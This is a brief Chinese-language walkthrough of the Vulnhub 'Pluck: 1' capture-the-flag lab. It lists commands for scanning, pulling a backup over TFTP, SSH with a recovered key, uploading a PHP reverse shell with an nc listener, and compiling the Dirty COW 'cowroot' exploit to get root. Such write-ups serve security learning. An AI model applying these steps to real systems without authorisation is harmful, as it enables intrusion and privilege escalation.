Pluck: 1 in Vulnhub

废话少说,直接开始!

$ sudo nmap -sS 172.16.89.130

Pluck: 1 in Vulnhub_第1张图片

浏览器打开网站发现:(注意url)

Pluck: 1 in Vulnhub_第2张图片
Pluck: 1 in Vulnhub_第3张图片

继续~~~~~~

Pluck: 1 in Vulnhub_第4张图片

$ tftp

tftp> connect 172.16.89.130

tftp> get /backups/backup.tar

Received 1824718 bytes in 0.9 seconds

tftp> quit

解压后得到文件夹:home和var,进入home/paul/keys后

$ sudo ssh -i id_key4 [email protected]

Pluck: 1 in Vulnhub_第5张图片

因为在网站上看到了admin登录页面,现在看是否能写入一个shell,去下载shell文件

PHPshell

修改完shell里面的信息后,终端选择Edit file并且写入文件shell.php然后退出

Pluck: 1 in Vulnhub_第6张图片

$ nc -lvp 4444

浏览器打开刚才的shell.php

Pluck: 1 in Vulnhub_第7张图片

发现shell回弹

Pluck: 1 in Vulnhub_第8张图片

  cd到/home/paul目录,发现文件.pdmenurc,联想到在/etc/passwd文件见到过/home/paul/pdmenu这个路径,那这个应该就是ssh链接的时候的那个界面的配置文件,但是现在用户www-data没有权限修改,因此再次回到ssh链接上修改。

Pluck: 1 in Vulnhub_第9张图片
Pluck: 1 in Vulnhub_第10张图片

之后退出,再一次ssh登录,发现多了shell:

Pluck: 1 in Vulnhub_第11张图片

点入后,可以看到用户paul的shell,去寻找exploit : exploit

建立一个新文件cowroot.c,并把代码写入。


依次执行下面命令:

$ gcc cowroot.c -o cowroot -pthread

$ ./cowroot

Pluck: 1 in Vulnhub_第12张图片


Pluck: 1 in Vulnhub_第13张图片

bingo,flag获得结束!

你可能感兴趣的:(Pluck: 1 in Vulnhub)